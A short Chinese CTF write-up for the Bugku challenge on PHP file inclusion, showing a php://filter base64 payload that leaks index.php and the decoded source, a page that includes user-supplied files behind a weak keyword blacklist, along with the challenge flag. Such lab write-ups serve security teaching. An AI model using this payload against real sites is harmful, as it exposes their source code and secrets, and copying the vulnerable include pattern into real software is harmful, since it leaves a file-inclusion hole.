Bugku-12.文件包含-php伪协议
2021/8/12 22:06:15
本文主要是介绍Bugku-12.文件包含-php伪协议,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
文件包含
利用php伪协议读取
谈一谈php://filter的妙用 | 离别歌 (leavesongs.com)
?file=php://filter/read=convert.base64-encode/resource=index.php
base64解码
<html>
<title>Bugku-web</title>
<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:flag{61d755938dc1bb9f1a14c0eb7e017f85}
?>
</html>
这篇关于Bugku-12.文件包含-php伪协议的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-03-29env: php: no such file or directory
- 2024-03-01php foreach break
- 2024-02-26Exception参数 php-icode9专业技术文章分享
- 2023-12-30PHP文件批量上传-icode9专业技术文章分享
- 2023-12-30thinkphp6 withJoin-icode9专业技术文章分享
- 2023-12-27MagicArray:像php一样,让Go业务代码不再卷!
- 2023-11-18centos7编译安装PHP教程。
- 2023-11-18centos7编译安装phpMyAdmin教程。
- 2023-10-13唱衰这么多年,PHP 仍然还是你大爷!
- 2023-07-25PHP8,性能更好,语法更好,类型安全更完善
